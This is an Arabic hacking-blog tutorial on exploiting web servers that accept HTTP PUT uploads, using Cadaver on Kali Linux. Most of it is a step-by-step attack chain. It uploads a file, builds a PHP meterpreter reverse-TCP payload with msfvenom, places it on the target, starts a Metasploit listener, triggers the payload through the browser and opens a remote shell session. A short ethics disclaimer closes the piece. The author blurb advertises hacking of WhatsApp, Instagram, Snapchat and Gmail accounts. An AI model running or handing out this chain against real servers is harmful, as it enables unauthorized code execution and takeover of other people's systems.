أقسام الوصول السريع (مربع البحث)

استغلال ثغرة HTTP PUT باستخدام Cadaver في Kali Linux

 استغلال ثغرة HTTP PUT باستخدام Cadaver في Kali Linux

في هذا المقال، سنتعرف على طريقة استغلال ثغرة HTTP PUT باستخدام Cadaver في نظام التشغيل Kali Linux. سنقدم لك تفاصيل مفصلة حول كيفية اكتشاف الثغرة وكيفية استغلالها بنجاح.

استغلال ثغرة HTTP PUT باستخدام Cadaver في Kali Linux
Cadaver

 ما هي ثغرة HTTP PUT؟


ثغرة HTTP PUT هي ثغرة تظهر عندما يتيح الموقع للمستخدمين القدرة على تحميل الملفات أو تعديل ملفات موجودة بالفعل على الخادم باستخدام طريقة PUT لبروتوكول نقل النصوص الفائقة (HTTP). يمكن أن تؤدي هذه الثغرة إلى تنفيذ أكواد برمجيه أو الكشف عن معلومات حساسة أو تعديل الموارد والمحتوى على الموقع الإلكتروني بطرق غير مصرّح بها.

تعتبر طريقة PUT من الطرق التي يمكن استخدامها في HTTP للتواصل بين العميل والموقع . يتم استخدامها بشكل رئيسي لتحميل الملفات على الخادم وتحديث ملفات موجودة. إذا لم يتم تأمين الإعدادات المتعلقة بطريقة PUT بشكل صحيح على خادم الويب، قد يتمكن المهاجمون من استغلال هذه الثغرة للوصول إلى الموارد والملفات الحساسة وتعديلها.

Cadaver: أداة استغلال ثغرة HTTP PUT

تعتبر Cadaver أداة استغلال ثغرة HTTP PUT المفتوحة المصدر والتي تم تطويرها لتوفير واجهة سطر أوامر للتفاعل مع خوادم الويب وتحديد مدى استغلال ثغرات HTTP PUT. يمكن استخدامها بشكل فعال لاختبار أمان تكوينات خوادم الويب والبحث عن الثغرات المحتملة.

التثبيت والاستخدام Cadaver

يمكنك تثبيت Cadaver بسهولة على Kali Linux باستخدام الأمر التالي:

sudo apt-get install cadaver

بعد التثبيت، يمكنك بء استخدام Cadaver للتفاعل مع خوادم الويب واستغلال ثغرة HTTP PUT عن طريق اتباع الخطوات التالية:

الخطوة الأولى: تحديد الموقع الذي ترغب في اختباره

أدخل الأمر التالي في Terminal لبدء Cadaver:

cadaver http://target-website.com

استبدل target-website.com بعنوان URL الخاص بالموقع الذي ترغب في اختباره.

الخطوة الثانية: التحقق من وجود ثغرة HTTP PUT


بمجرد الاتصال بالموقع المستهدف، يمكنك التحقق من إمكانية استغلال ثغرة HTTP PUT باستخدام الأمر التالي: 

put testfile.txt

إذا تم تحميل الملف بنجاح، فهذا يعني أن الموقع به ثغرة HTTP PUT ويمكن استغلالها.

الخطوة الثالثة: استغلال ثغرة HTTP PUT

بما أننا أكدنا وجود الثغرة، يمكننا الآن استغلالها. يمكنك إعداد ملف ضار باستخدام مكتبةفنون الحرب (msfvenom) لإنشاء ملف ضار يمكن تنفيذه على الخادم. قم بإنشاء ملف ضار من نوع PHP باستخدام الأمر التالي:

msfvenom -p php/meterpreter/reverse_tcp LHOST=your_ip_address LPORT=your_port -f raw > payload.php

تأكد من استبدال your_ip_address بعنوان IP الخاص بك وyour_port بالمنفذ الذي ترغب في استخدامه.

بعد إنشاء الملف الضار، يمكنك رفعه إلى الموقع المستهدف باستخدام Cadaver:

put payload.php

 الخطوة الرابعة: إنشاء جلسة استماع

بعد رفع الملف الضار بنجاح، قم بإعداد جلسة استماع على جهاز الاستهداف باستخدام Metasploit:

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST your_ip_address
set LPORT your_port
exploit

بمجرد تنفيذ هذه الأوامر، ستقوم أداة Metasploit بالاستماع على المنفذ المحدد، في انتظار الاتصال الوارد من الملف الضار المنفذ على الخادم.

 الخطوة الخامسة: تنفيذ الملف الضار

الآن، يجب عليك تنفيذ الملف الضار على الخادم المستهدف لإنشاء الاتصال العكسي مع جهازك. يمكنك فعل ذلك عن طريق زيارة الرابط التالي في متصفح الويب الخاص بك:

http://target-website.com/payload.php

بعد زيارة هذا الرابط، ستتلقى جلسة متصلة من الملف الضار على أداة Metasploit.

الخطوة السادسة: التفاعل مع الجلسة

بمجرد تلجلسة متصلة على Metasploit، يمكنك الآن التفاعل مع الجلسة وتنفيذ الأوامر على الخادم المستهدف. استخدم الأمر التالي للتفاعل مع الجلسة:

sessions -i session_number

استبدل session_number برقم الجلسة الذي تراه على Metasploit. بمجرد الدخول إلى الجلسة، يمكنك تنفيذ الأوامر المختلفة على الخادم المستهدف.

في هذا المقال، تعلمنا كيفية استغلال ثغرة HTTP PUT باستخدام أداة Cadaver في Kali Linux. بالإضافة إلى ذلك، تعرفنا على الخطوات المفصلة لاكتشاف الثغرات واستغلالها بنجاح. تأكد دائمًا من اتباع القواعد الأخلاقية لاختبار الاختراق والتقيد بالقوانين المحلية والدولية المتعلقة بأمان المعلومات.

Tareq Shadow
Tareq Shadow
Shadow Hacker Shadow Hacker Arb git Shadow Bunty aearb xcashadvances أفضل موقع عربي لتعليم الهكر هكر تهكير واتس اب انستقرام جيميل تهكير سناب شات اختراق سناب شات اختراق ... واتس اب احتراق انستقرام تهكير انستقرام hack hacker hacking snap chat hack والاختراق kali linux . نقدم دروس حول تهكير و اخبار الهكر و اختراق.هكر ببجي Termux الربح من الأنترنت تطبيقات تعلم الهكر Pubg Hack امن المعلومات
تعليقات